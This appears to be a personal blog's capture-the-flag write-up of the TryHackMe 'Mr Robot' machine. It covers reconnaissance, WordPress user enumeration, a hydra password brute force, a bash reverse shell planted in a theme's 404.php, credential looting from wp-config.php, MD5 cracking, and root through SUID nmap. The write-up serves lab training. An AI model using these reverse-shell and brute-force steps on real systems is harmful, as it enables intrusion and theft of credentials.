u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Mr Robot

Writeup about the Tryhackme machine Mr Robot.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick Ping:

ping -c 1 10.10.πŸ˜„                                                                                                                                                                                                                 1 β¨―
PING 10.10.πŸ˜„ (10.10.πŸ˜„) 56(84) bytes of data.
64 bytes from 10.10.πŸ˜„: icmp_seq=1 ttl=63 time=181 ms

--- 10.10.πŸ˜„ ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 180.594/180.594/180.594/0.000 ms

ttl 63 so it is a Linux machine.

Quick scan

nmap -p- --open -T5 -v 10.10.πŸ˜„ -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 18:09 CEST
Initiating Connect Scan at 18:09
Scanning 10.10.πŸ˜„ [65535 ports]
Discovered open port 80/tcp on 10.10.πŸ˜„
Discovered open port 443/tcp on 10.10.πŸ˜„
Connect Scan Timing: About 28.91% done; ETC: 18:11 (0:01:16 remaining)
Connect Scan Timing: About 55.63% done; ETC: 18:11 (0:00:49 remaining)
Completed Connect Scan at 18:11, 107.19s elapsed (65535 total ports)
Nmap scan report for 10.10.πŸ˜„
Host is up (0.041s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

Port 80 and 443, looks like a standard web server

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10.πŸ˜„ -oN full_scan.txt    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 18:12 CEST
Nmap scan report for 10.10.πŸ˜„
Host is up (0.036s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds

Cool and depresing stuff from the Mr Robot series 😎 on the port 80 and 443

alt text

alt text

The site is running a wordpress, for a better analysis let’s use wpscan:

wpscan --url http://10.10.πŸ˜„/join --api-token=API_TOKEN

a lot of vulnerabilities…If I can not find anything more evident I will come back here, because the wordpress version is very old.

Also enumerating with gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.πŸ˜„                                                                                                                                    5 β¨―
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.πŸ˜„
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/13 18:38:39 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 234] [--> http://10.10.πŸ˜„/images/]
/blog                 (Status: 301) [Size: 232] [--> http://10.10.πŸ˜„/blog/]  
/rss                  (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/feed/]    
/sitemap              (Status: 200) [Size: 0]                                   
/login                (Status: 302) [Size: 0] [--> http://10.10.πŸ˜„/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/0/]          
/video                (Status: 301) [Size: 233] [--> http://10.10.πŸ˜„/video/]    
/feed                 (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/feed/]       
/image                (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/image/]      
/atom                 (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/feed/atom/]  
/wp-content           (Status: 301) [Size: 238] [--> http://10.10.πŸ˜„/wp-content/]
/admin                (Status: 301) [Size: 233] [--> http://10.10.πŸ˜„/admin/]     
/audio                (Status: 301) [Size: 233] [--> http://10.10.πŸ˜„/audio/]     
/intro                (Status: 200) [Size: 516314]                                  
/wp-login             (Status: 200) [Size: 2657]                                    
/css                  (Status: 301) [Size: 231] [--> http://10.10.πŸ˜„/css/]       
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/feed/]        
/license              (Status: 200) [Size: 309]                                     
/wp-includes          (Status: 301) [Size: 239] [--> http://10.10.πŸ˜„/wp-includes/]
/js                   (Status: 301) [Size: 230] [--> http://10.10.πŸ˜„/js/]         
/Image                (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/Image/]        
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/feed/rdf/]     
/page1                (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/]              
/readme               (Status: 200) [Size: 64]                                       
/robots               (Status: 200) [Size: 41]                                       
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.πŸ˜„/wp-admin/]     
/%20                  (Status: 301) [Size: 0] [--> http://10.10.πŸ˜„/]   

Interesting info on the robots.txt

http://10.10.πŸ˜„/robots

User-agent: *
fsocity.dic
key-1-of-3.txt

http://10.10.πŸ˜„/key-1-of-3.txt

Firts flag done:

073403c8πŸ˜„

http://10.10.πŸ˜„/phpmyadmin

But it is only accesible via localhost or with a ssh tunnel, not fun.

Getting the fsocity.dic:

wget http://10.10.πŸ˜„/fsocity.dic

2 - Vulnerability Identification

Basic testing demostrates that the wordpress site is vulnerable to leak users, because the error message confirms the presence of a determinated user

Test admin/admin

alt text

With this idea I can enumerate users:

Looking inside on the dictionary found on the robots txt, some words got my attention Robot and Elliot, Robot failed, but Elliot got a different error:

alt text

So the word Elliot is a valid user. I tried to bruteforce the login page, but was slow as hell because the wordlist is not well constructed.

there are many repeated words:

Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
cat fsocity.dic| wc                                                                                                                                                                                                                 130 β¨―
 858160  858160 7245381

A little tunning with sort -u to get only unique words, reduced by a lot the dictionary

cat fsocity.dic| sort -u | wc
  11451   11451   96747

Creating a new dictionary with unique words:

cat fsocity.dic| sort -u > good.dic

Launching again hydra:

hydra -l "Elliot" -P good.dic 10.10.πŸ˜„ http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=http%3A%2F%2F10.10.πŸ˜„%2Fwp-admin%2F&testcookie=1:The password you entered for the username' -I -V

After a while the bruteforce attack worked:

[80][http-post-form] host: 10.10.πŸ˜„   login: Elliot   password: E****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-13 20:51:59

So I can log in to the wordpress site

Inside there 2 users:

alt text

[80][http-post-form] host: 10.10.πŸ˜„   login: Elliot   password: ERπŸ˜„

3 - Exploit

This time I used a reverse shell on the 404.php page , Twenty Fifteen: 404 Template (404.php)

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.πŸ˜„/8080 0>&1'");

And triggering the 404 page with a random url:

http://10.10.πŸ˜„/nothing

nc -lvp 8080                                                                                                                                                                                                                        255 β¨―
listening on [any] 8080 ...
10.10.πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.9.πŸ˜„] from (UNKNOWN) [10.10.πŸ˜„] 51267
bash: cannot set terminal process group (1760): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$

Worked

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Upgraded my shell with python and magic:

python -c 'import pty;pty.spawn("/bin/bash")'

stty raw -echo
fg
reset
xterm

export TERM=xterm
export SHELL=bash

stty rows 19 columns 238

Looting users from the wp-config.php

define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7eπŸ˜„');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');

/** MySQL database username */
define('DB_USER', 'bn_wordpress');

/** MySQL database password */
define('DB_PASSWORD', '570πŸ˜„');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

Inside the /home the only user who has home is robot:

daemon@linux:/home/robot$ cat key-2-of-3.txt 
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5 
robot:c3fcd:smile:

There are the next flag and the password in md5. Let’s crack it with john.

I tried to use the fsocity.dic wordlist but it did not work so I used rockyou instead and worked fine

john hash_robot.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
john --show  --format=raw-md5  hash_robot.txt
robotπŸ”€smile:

1 password hash cracked, 0 left

login as robot:

robot@linux:~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Flag 2/3 done, only one left

robot@linux:~$ cat key-2-of-3.txt 
822c7πŸ˜„

4 - Post-Exploitation and privilege eescalation

Now with a low privileged account started enumerating common things:

robot@linux:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
30 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D

Nothing useful, so I uploaded a linpeas.sh to the machine and I discovered nmap with SUID activated:

python3 -m http.server 7777                                                                                  
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
10.10.πŸ˜„ - - [13/Jul/2021 21:28:44] "GET /linpeas.sh HTTP/1.1" 200 
robot@linux:/tmp$ /usr/local/bin/nmap -V

nmap version 3.81 ( http://www.insecure.org/nmap/ )

So the version is vulnerable to SUID with interactive mode:

https://gtfobins.github.io/gtfobins/nmap/


robot@linux:/tmp$ /usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root

Machine rooted !

# cat key-3-of-3.txt
04787πŸ˜„

Thanks for reading!